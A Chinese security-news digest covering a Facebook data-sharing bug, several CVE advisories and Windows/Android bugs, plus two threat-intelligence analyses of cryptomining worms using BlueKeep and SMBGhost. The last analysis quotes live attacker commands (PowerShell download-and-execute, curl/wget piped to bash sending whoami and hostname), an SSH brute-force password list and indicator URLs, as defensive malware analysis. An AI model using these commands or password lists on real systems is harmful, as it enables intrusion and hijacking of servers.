分类: 漏洞事件

Facebook 再曝漏洞:与开发者超时分享用户数据

新浪科技讯 北京时间7月2日早间消息,在“剑桥分析丑闻”遭到曝光后,Facebook曾经承诺在与外部开发者分享用户数据时施加时间限制,但实际期限却超出他们当初的承诺。 该公司之前表示,如果用户超过90天未与开发者互动,就将阻止该应用获取用户数据。届时,开发者需要重新获得许可才能再次获得电子邮箱、生日和所在城市等数据的访问权, 但Facebook在周三的博文中表示,这项规定在某些情况下未能顺利实施。如果用户也通过该应用与Facebook好友联系,开发者就可以同时获取这两个用户的数据。但该公司发言人称,这项漏洞却会导致开发者在获得一个活跃用户的数据时,也可以看到该用户好友的数据,即使后者已经超过90天没有打开这款应用。 Facebook透露,这一问题涉及约5000个开发者。但他们并未披露可能受此影响的用户数。 “我们在发现问题后就予以解决。”Facebook在博文中写道,“我们将会继续调查,并将继续围绕任何重大更新保持透明度。” 该漏洞是由一名Facebook工程师两周前发现的,但该公司称,他们没有理由认为相关数据遭到滥用。 Facebook在与第三方分享数据方面有过许多不良记录。这项90天的时间限制就是源自两年多以前的“剑桥分析丑闻”,那家政治数据分析公司当时购买了数百万Facebook用户的数据,但这些数据却是在用户并不知情的情况下收集的。 Facebook当时对许多数据共享产品进行限制,还实施新规,要求用户更加明确地授权外部应用使用其信息。该公司还因为这项丑闻的相关调查在2019年中与美国联邦贸易委员会签订50亿美元的隐私和解协议。(书聿)   (稿源:新浪科技,封面源自网络。)

微软发布紧急安全更新 修复 Windows 10/Server 中的安全漏洞

距离本月的补丁星期二活动日还有大约两周时间,但由于在 Windows 10 以及 Windows Server 中发现了安全漏洞,今天微软发布了两个紧急安全更新。微软表示,这两个漏洞虽然没有公开披露,被黑客利用的可能性较小,但公司等不到7月14日的补丁星期二活动日发布这个更新了。 微软在安全公告中写道:“微软Windows Codecs Library处理内存中对象的方式存在远程代码执行漏洞。成功利用该漏洞的攻击者可以获取信息,进一步危害用户的系统。” 据悉,受影响的 Windows 版本包括 Windows 10 version 1709 Windows 10 version 1803 Windows 10 version 1809 Windows 10 version 1903 Windows 10 version 1909 Windows 10 version 2004 Windows Server 2019 Windows Server version 1803 Windows Server version 1903 Windows Server version 1909 Windows Server version 2004   (稿源:cnBeta,封面源自网络。)

ThanatosMiner 来了,捕获利用BlueKeep高危漏洞攻击传播的挖矿木马

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/oFnOODmShuuE5OUfbZKiEQ   一、背景 腾讯安全威胁情报中心检测到ThanatosMiner(死神矿工)挖矿木马利用BlueKeep漏洞CVE-2019-0708攻击传播。攻击者将公开的Python版本BlueKeep漏洞利用代码打包生成scan.exe,大范围扫描随机生成的IP地址进行探测和攻击。 漏洞利用成功后执行shellcode下载C#编写的木马svchost.exe,然后利用该木马下载门罗币挖矿木马以及攻击模块进行下一轮攻击。因Payload程序Assembly Name为ThanatosCrypt,将该挖矿木马命名为ThanatosMiner(死神矿工)。 2019年5月15日,微软发布了针对远程桌面服务(Remote Desktop Services )的关键远程执行代码漏洞CVE-2019-0708的安全更新,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作——意味着,存在漏洞的电脑只需要连网,勿须任何操作即可能遭遇远程黑客攻击而沦陷。BlueKeep漏洞(CVE-2019-0708)是所有安全厂商高度重视的高危漏洞。 该漏洞影响旧版本的Windows系统,包括: Windows 7、WindowsServer 2008 R2、Windows Server 2008、Windows 2003、Windows XP。Windows 8和Windows10及之后版本不受此漏洞影响。 腾讯安全系列产品已全面支持对ThanatosMiner(死神矿工)挖矿木马的查杀拦截,腾讯安全专家强烈建议用户及时修补BlueKeep漏洞,避免电脑被挖矿木马自动扫描攻击后完全控制。 二、样本分析 攻击模块scan.exe通过pyinstaller打包Python代码生成exe,使用pyinstxtractor.py可解压出Python编译后的无后缀文件scan。pyinstaller在打包pyc的时候会去掉pyc的magic和时间戳,而打包的系统库文件中这两项内容会被保留,所以可以查看解压出的系统库中的magic和时间戳并添加到scan的文件头,然后将其命名为scan.pyc,并通过uncompyle6进行反编译,可以还原的Python代码scan.py。 分析发现,Python3版本编译后的二进制文件开头为e3 00 00 00 00 00 00 00,Python2版本通常为63 00 00 00 00 00 00 00。 scan.py获取本机同网段IP地址,以及随机生成的外网IP地址扫描3389端口。 利用公开的BlueKeep漏洞CVE-2019-0708攻击代码进行攻击。 漏洞攻击成功执行shellcode命令,在%Temp%目录下创建DO.vbs,下载执行http[:]//download.loginserv.net/svchost.exe。 Payload木马svchost.exe采样C#编写,代码经过Dotfuscator混淆处理,可使用开源工具De4dot去除部分混淆,程序的Assembly Name为ThanatosCrypt。 运行后会检测以下注册表项和磁盘文件判断是否在虚拟机中运行。 SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers SOFTWARE\VMWare, Inc.\VMWare Tools SOFTWARE\Oracle\VirtualBox Guest Additions C:\windows\Sysnative\Drivers\Vmmouse.sys C:\windows\Sysnative\Drivers\vmci.sys C:\windows\Sysnative\Drivers\vmusbmouse.sys C:\windows\Sysnative\VBoxControl.exe 通过IsDebuggerPresent() 、IsDebuggerAttached()、CheckRemoteDebuggerPresent()判断进程是否被调试。 若无虚拟机环境、未处于被调试状态则继续执行。 然后svchost.exe继续下载http[:]//download.loginserv.net/scan.exe进行扫描攻击,以及下载http[:]//download.loginserv.net/xmrig.exe挖矿门罗币。 IOCs Domain download.loginserv.net MD5 URL http[:]//download.loginserv.net/svchost.exe http[:]//download.loginserv.net/xmrig.exe http[:]//download.loginserv.net/scan.exe http[:]//download.loginserv.net/mine.exe   参考链接 1.Windows远程桌面服务漏洞预警(CVE-2019-0708) https://mp.weixin.qq.com/s/aTSC0YR1dxSUHVJ3pnZezA 2.漏洞预警更新:Windows RDS漏洞(CVE-2019-0708) https://mp.weixin.qq.com/s/OEjI776O3cTjtMrsPdtnpQ 3.Windows远程桌面漏洞风险逼近,腾讯安全提供全面扫描修复方案 https://mp.weixin.qq.com/s/ckVHic2oChjZmVvH_zmsHA 4.Windows远程桌面服务漏洞(CVE-2019-0708)攻击代码现身 https://mp.weixin.qq.com/s/bcANAbzONFyrxqNMssTiLg 5.RDP漏洞(BlueKeep)野外利用预警,腾讯御知免费检测 https://mp.weixin.qq.com/s/G2ZS7rKkYYvEtbxUm0odGA 6.永恒之蓝下载器木马再升级,集成BlueKeep漏洞攻击能力 https://mp.weixin.qq.com/s/_teIut43g6In9YZ7VQ2f7w

Dubbo 反序列化漏洞,可导致远程代码执行

近日 Dubbo 官方报告了一个 Dubbo 远程代码执行问题(CVE-2020-1948),该问题由 Provider 反序列化漏洞引起。根据介绍,攻击者可以使用无法识别的服务名称或方法名称,并带上一些恶意参数有效载荷发送 RPC 请求。当恶意参数反序列化后,将执行一些恶意代码。 受影响的版本: 2.7.0 <= Dubbo Version <= 2.7.6 2.6.0 <= Dubbo Version <= 2.6.7 所有 2.5.x 版本(官方团队不再支持) 所有 Dubbo 版本都可以升级到 2.7.7 或更高版本,避免该漏洞:https://github.com/apache/dubbo/releases/tag/dubbo-2.7.7 详情查看邮件列表。     (稿源:开源中国,封面源自网络。)

Apache Tomcat HTTP/2 DoS 漏洞 影响多个版本

Apache Tomcat 安全团队报告了一个 Tomcat HTTP/2 DoS 漏洞。 HTTP/2 请求的特制序列可能会在数秒内引发较高的 CPU 使用率,如果有足够数量的此类请求在并发 HTTP/2 连接上进行连接时,服务器可能无响应,即造成拒绝服务。 该漏洞严重等级定为“重大”(Important),编号 CVE-2020-11996。 受影响的软件版本包括: Apache Tomcat 10.0.0-M1 到 10.0.0-M5 Apache Tomcat 9.0.0.M1 到 9.0.35 Apache Tomcat 8.5.0 到 8.5.55 官方给出的缓解方法: 升级到 Apache Tomcat 10.0.0-M6 或更高版本 升级到 Apache Tomcat 9.0.36 或更高版本 升级到 Apache Tomcat 8.5.56 或更高版本 具体细节可以查看: http://tomcat.apache.org/security-10.html http://tomcat.apache.org/security-9.html http://tomcat.apache.org/security-8.html     (稿源:开源中国,封面源自网络。)

Windows 10 Version 2004 新 BUG:重复报告安全警报

上月发布的 Windows 10 May 2020(20H1/Version 2004)功能更新在安全方面引入了诸多改进,其中就包括阻止潜在不必要程序(PUP/PUA)的能力。微软表示 PUP 包括各种类型的系统软件捆绑、驱动程序和注册表优化器等。 不过近日 Version 2004 用户反馈,即使在 PUP 应用程序被清理之后,Windows Security 应用程序依然会触发警报。在 PUP 应用程序被移除或者允许在 Windows 10 上运行之后,Windows Security 在随后的扫描中依然会检测到旧项目,造成错误的检测循环。 一位用户指出:“我在进行常规扫描时,发现这些威胁被高亮显示为低级,而且 Defender 无法删除它们,导致一直显示。我同样使用了 Malwarebytes 进行扫描,但这边并没有显示出来。” 看来,Windows Defender 已经被默认为在Windows 10 Version 2004 中识别 PUP 为威胁。在 PUP 被删除后,Windows Defender 在随后的历史记录扫描中又将同一文件识别为威胁。 想要修复这个问题,你需要通过以下步骤删除PUPs历史信息: 1.打开 “文件资源管理器”。 2.导航到C:/程序数据/Microsoft/Windows Defender/Scans/History/Service。 3.在服务文件夹中,删除PUP相关文件。 4.重启Windows并在Windows安全应用中进行快速扫描。     (稿源:cnBeta,封面源自网络。)  

Red Hat 报告了一个安全问题,可导致 DoS

Red Hat 近日报告了一个内核中的安全问题,根据描述,Red Hat 内核在“关联数据的身份验证加密”(AEAD,Authenticated Encryption with Associated Data)中存在缺陷,这是一种加密技术。具体是在 IPsec 加密算法模块 authenc 的 crypto/authenc.c 中的 crypto_authenc_extractkeys 中发现了缓冲区超读漏洞。当有效载荷大于 4 字节且未遵循 4 字节对齐边界准则时,它将导致缓冲区超读威胁,从而导致系统崩溃。此漏洞使具有用户特权的本地攻击者可以执行拒绝服务。 目前该漏洞已录入 CVE-2020-10769。 不过该问题在 17 个月前也就是 19 年 1 月的 Linux LTS 内核上游中已经修复过了,详情见 https://lkml.org/lkml/2019/1/21/675。 并且在 14 个月前,该问题的回归测试也已经提交到了 LTP(Linux Test Project,Linux 测试项目),此次发现这一特定下游问题,应当是 LTP 测试未通过导致的。因此报告安全的邮件中提醒:“大多数 Linux 内核已经修复了这一错误,而没有在 LTP 中添加回归测试,这意味着挑选特定内核补丁来修复 LTP 问题不如合并所有 LTS 内核修复程序来得稳妥。”   (稿源:开源中国,封面源自网络。)

部分 Microsoft Edge 开机自动启动,微软确认是 bug

本月初微软通过 Windows Update 将新版 Microsoft Edge 推送给用户,并自动取代旧版 Edge。当然,如果系统原本默认的浏览器不是 Microsoft Edge,那么升级到新版后也不会改变这一设置。 不过部分用户最近反馈的一个情况却会让人误以为微软正在另辟蹊径让他们将 Microsoft Edge 作为默认浏览器。根据用户的反馈,无论在 edge://settings/onStartup 中进行了哪种设置,无论何时启动 PC 并登录 Windows,部分 Microsoft Edge 都会随系统启动而启动。也就是说,开机并进入桌面后,Microsoft Edge 便会自动启动。 微软收到反馈的消息后,很快就确认了这是一个 bug。不过工程师目前也不能确认此错误的发生是否伴随了系统其他的行为更改。 上文提到的 edge://settings/onStartup 设置影响的是打开浏览器后的行为,与操作系统的设置并没有直接关系。 由于用户提供的信息有限,因此工程师无法定位导致 bug 产生的原因。不过根据外国科技媒体 Softpedia 的报道,这种情况发生在通过 Windows Update 自动下载安装更新的设备上。 如果你也受到此问题的影响,并且希望帮忙解决问题,可查看博客文章以获取详细信息。在博客文章中,微软提供了有关如何通过浏览器内置反馈工具共享诊断数据的完整说明。     (稿源:开源中国,封面源自网络。)

谷歌 Pixel 4 Android 11 降级 Android 10 出 bug:面部识别不能用

6月15日消息,上周Android 11 Beta 1正式上线,谷歌Pixel机型率先尝鲜。考虑到这是Beta版Android 11,系统方面不够稳定,不少Pixel用户升级到Android 11之后选择降级回到Android 10,然而在降级之后发现了新的Bug。 据9to5Google报道,不少用户反馈谷歌Pixel 4、Pixel 4 XL降级回到Android 10之后面部识别不能用,系统提示面部信息无法录入。 谷歌方面承认了这一错误,表示会在后续版本中修复这一bug。9to5Google提醒用户,升级到Android 11的Pixel 4系列用户谨慎降级,否则面部识别无法使用。由于Pixel 4、Pixel 4 XL仅支持3D人脸识别,没有指纹,所以降级后如果出错只能用传统的密码或者图案解锁,安全性方面会降低。 值得一提的是,除了Pixel 4系列之外,一加8系列、Realme X50 Pro系列、小米10系列、小米POCO F2 Pro、Find X2系列等都将在本月尝鲜Android 11,值得期待。     (稿源:快科技,封面源自网络。)

“黑球”行动再升级,SMBGhost 漏洞攻击进入实战

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA   一、概述 2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,之前的若干种病毒只是利用SMBGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。 由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限,可直接攻击SMB服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统最高权限。该攻击行动使得“永恒之蓝”系列木马针对Windows系统的攻击能力再次增强。 腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补SMBGhost漏洞(CVE-2020-0796)。 此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。 二、样本分析 攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode: powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'') 针对Linux系统服务器的攻击 1、利用SSH爆破 扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破使用密码字典: “saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,” “,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta” 爆破登陆成功后执行远程命令: `Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash` 2、利用Redis未授权访问漏洞 扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令: `export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash` SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能: a.创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp b.创建crontab定时启动Linux平台挖矿木马/.Xll/xr 通过定时任务执行的a.asp首先会清除竞品挖矿木马: 然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击: 创建目录/.Xll并下载挖矿木马(d[.]ackng.com/ln/xr.zip)到该目录下,解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。 永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态,目前该木马会通过以下方法进行扩散传播: 截止2020年6月12日,永恒之蓝木马下载器家族主要版本更新列表如下: IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com URL http[:]//t.amynx.com/smgh.jsp http[:]//t.amynx.com/a.jsp http[:]//t.amynx.com/ln/a.asp http[:]//t.amynx.com/ln/core.png http[:]//d.ackng.com/if.bin http[:]//d.ackng.com/smgh.bin http[:]//d.ackng.com/ln/xr.zip